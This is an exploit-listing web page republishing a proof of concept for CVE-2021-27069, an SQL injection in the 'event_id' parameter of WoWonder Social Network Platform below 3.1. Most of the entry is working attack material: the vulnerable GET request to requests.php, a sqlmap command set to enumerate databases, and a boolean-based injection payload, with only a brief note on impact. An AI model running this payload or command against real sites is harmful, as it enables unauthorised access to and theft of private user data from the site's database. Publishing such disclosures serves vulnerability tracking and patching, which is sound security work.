WoWonder Social Network Platform 3.1 event_id SQL Injection

CVE Category Price Severity
CVE-2021-27069 CWE-89 $3,000 High
Author Risk Exploitation Type Date
SunCSR Team Critical Remote 2021-03-24
Our sensors found this exploit at:

Below is a copy:

WoWonder Social Network Platform 3.1 event_id SQL Injection
# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
# Date: 16.03.2021
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: < 3.1
# Tested on: Linux/Windows


In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.

The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.

if an attacker exploits this vulnerability, attacker may access private data in the database system.


# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
# Host: Target

Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs

Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.